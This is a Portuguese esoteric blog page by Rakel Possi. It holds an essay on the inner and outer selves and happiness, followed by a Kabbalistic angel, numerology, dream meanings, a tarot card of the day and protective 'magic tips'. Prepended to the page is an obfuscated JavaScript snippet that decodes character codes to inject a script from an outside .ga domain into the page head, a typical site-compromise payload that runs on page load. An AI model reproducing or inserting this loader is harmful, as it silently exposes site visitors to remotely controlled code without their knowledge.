Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,115,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); OS DIFERENTES ‘EUS’ E O ENCONTRO DA FELICIDADE | Rakel Possi

OS DIFERENTES ‘EUS’ E O ENCONTRO DA FELICIDADE

Propaganda

Este contenido también puede ser leído en: Español

FAÇA SUA PERGUNTA GRATUITA AO TAROT EM RAKEL RESPONDE.
Semanalmente
é sorteada uma pergunta. Boa sorte!

Veja o SORTEADO DA SEMANA
De 08 a 15 de julho: A.C.L. – Pindamonhangaba- SP – BRASIL

                       

       


 QUARTO MENGUANTE
  

 
Ola amigos!
Conhecer-se é bastante difícil, exige trabalho e perseverança. Precisamos distinguir os eus que nos formam. Temos o eu interno e o eu personalidade. O eu interno é sempre claro, concreto, bem definido. O outro eu, o da personalidade, é alimentado pelas situações externas, é o que chamamos de vida. O eu interior deve entrar em contato com o Eu Superior e, estando cada vez mais em sintonia, promover o crescimento e a evolução. O outro eu deve ser transmutado porque ele carrega toda a carga negativa da vida diária e nos afasta da realidade envolvendo-nos em situações ilusórias. Precisamos conhecer bem nosso eu exterior para poder lidar com ele e transformá-lo em ações de bem. Podemos simbolizar estes eus com a figura da estrela de seis pontas, conhecida como estrela de Salomão. Ela é composta de dois triângulos, um com a ponta para cima representa o eu interior em sua procura constante para a evolução. O segundo, um triângulo com a ponta para baixo, representa o contato com a matéria. Quando os dois se encontram perfeitamente entrelaçados representam o equilíbrio do ser em sua vida terrena procurando manter-se sempre entre Deus, a Sabedoria, e a vida material. O trabalho com os Mestres Ascensionados e Seres de Luz nos ensina a reforçar este equilíbrio para que, vivendo bem na vida terrena, possamos dedicar mais tempo à vida espiritual e o re-encontro com o aspecto Divino em nós. Quando permitimos que o Eu Superior se manifeste iniciamos a elevação por sobre os estados inconscientes-ilusórios da personalidade, isto é, começamos a ter a mente mais alerta para discernir entre o que é realmente necessário e útil para o crescimento e o que é apenas ilusão, confundida com realidade. Por exemplo, o dinheiro é uma realidade para vivermos na Terra porque este é um meio material que foi instituído como forma de troca. Porém, acreditar que a felicidade depende dele não é verdadeiro correspondendo assim ao eu inferior, ou personalidade, e não ao Eu Superior. Se trabalharmos para sair dos processos ilusórios deste eu inferior perceberemos que a somente uma única natureza: a Divina, e Dela depende tudo porque se fomos feitos a imagem e semelhança de Deus, isto quer dizer que temos as características e as qualidades de criação e multiplicação Divina em nosso universo pessoal, a vida. Quando o aspecto espiritual se une ao material compreendemos que nada é separado, mas que o próprio ser humano fez a separação e desejamos, ardentemente, nos unir de novo com Deus. Isto é o que chamamos de felicidade. Busque a sua! Com amor da amiga Rakel Possi.

ANJO CABALÍSTICO
MEBAHIAH   Deus eterno
Coro dos Principados-  Príncipe Haniel
AYUDA AOS CASAIS QUE DESEJAM TER FILHOS. Torna as pessoas piedosas. O Gênio contrário influencia os que são contra a religião e a regeneração da raça humana. 
Salmo 102 vers 12: Mas Tu Senhor, permanecerás para sempre e a Tua memória de geração em geração. Rezar das 18:00h às 18:20h com vela: azul e incenso de jasmim. 

NUMEROLOGIA  O número do dia
24 de julho de 2011  > 2+4+7+2+1+1= 17/8
NÚMERO 8: Esta vibração numérica nos inspira a cuidar dos bens materiais, papéis e o dinheiro em si mesmo, mas também nos alerta para o carma, a vida que criamos através das nossas ações. Hoje dediquemos o dia a cuidar da vida terrena com vistas a um futuro melhor. 
Veja mais em NUMEROLOGIA

SONHOS:
BOLSA: cheia: problemas resolvidos com sucesso. Dar uma bolsa de presente: vitória sobre aquela pessoa. Vazia: tente de novo no jogo.
Veja mais em Sonhos

TAROT  A CARTA DO DIA
O IMPERADOR: Uma carta de poder material que influencia neste dia a todos aqueles que se dedicam a conseguir o que precisam ou desejam. Crescimento, sucesso, fortuna. Êxito na vida física (esportes) e nos negócios, desde que sejam de pequeno porte. Dá proteção para os que trabalhem honestamente. Emocionalmente, a carta faz um chamado a se analisar o que se diz antes de magoar as pessoas já que neste dia é muito provável que as pessoas tentem se comunicar sem muito cuidado. Para quem não está bem internamente pode haver insegurança ao se tomar decisões e demonstrações de orgulho que afastarão as pessoas da sua vida.  A figura corresponde ao Tarot de Jung.

CADASTRE-SE E FAÇA SUA PERGUNTA GRATUITA AO TAROT EM RAKEL RESPONDE  SEMANALMENTE É SORTEADA UMA PERGUNTA

GRANDE FRATERNIDADE BRANCA   
A cor de hoje é AZUL
Mestre Ascensionado: EL MORYA
Raio Gêmeo: MESTRA MY-RRAH
Arcanjo: MIGUEL        
Complemento Divino: FE
Elohin: HÉRCULES
Complemento Divino: AMAZONA
Os guerreiros de um novo amanhã são do Raio Azul. Impetuosos e cheios de coragem, devem controlar seu desejo de controle sobre todos e aprender a comandar com amor e sabedoria e não com violência. Ser do Raio Azul é não se deixar abater pelas provas da vida por mais difíceis que estas sejam, mas conservar a fé e transmutar o ódio e a vingança em amor.
MANTRA: EU SOU O PODER DO RAIO AZUL! EU SOU! 
Vela: azul.     Incenso: jasmim.      Pedra: ágata azul, diamante.

Veja mais em Grande Fraternidade Branca, Mestres.

DICAS MÁGICAS 
– Coloque fotos das pessoas e objetos que deseje proteger: filhos, marido, esposa, carro, bicicleta, etc.,etc., dentro de um envelope azul e por cima ponha uma pedra de ágata azul. Deixe num lugar que considere sagrado dentro de casa, como seu altar. Estará trabalhando com a energia Poderosa do Arcanjo Miguel. Faça diariamente a Invocação de Proteção ao Arcanjo Miguel.
– Use sempre uma pedra azul com você e uma vez por semana ponha-a de molho em água com sal grosso. Deixe a noite toda, de manhã seque e volte a usar. Esta pedra ajuda a ter disposição, determinação e fé.
– Para afastar o mal peçamos ao Poderoso Arcanjo Miguel e ao Elohin Hércules que levantem as Poderosas Espadas e com Força retirem tudo o que nos prejudica. Acendamos uma vela azul em agradecimento.

Sobre o autor

Rakel Possi

Psicóloga e Practitioner em PNL. Autora de diversos livros, ela assumiu a missão de preparar e ajudar pessoas e organizações se adaptarem melhor ao momento do universo. A competência com foco no desenvolvimento humano e ecológico é o seu forte. /// En español: Psicóloga y Practitioner en PNL. Autora de diversos libros, asumió la misión de preparar, y ayudar, personas y organizaciones a adaptarse mejor al momento del universo. La competencia con foco en el desarrollo humano y ecológico es su fuerte.

CONTATO RAKEL POSSI

 

WhatsApp - Rakel Possi

Celular - WhatsApp

+55 (13) 991511707

 


 

Email - Rakel Possi

E-mail

[email protected]

 


 

Messenger - Rakel Possi

Messenger - Facebook

Click para enviar mensagem

 

Facebook Rakel Possi

Instagram Rakel Possi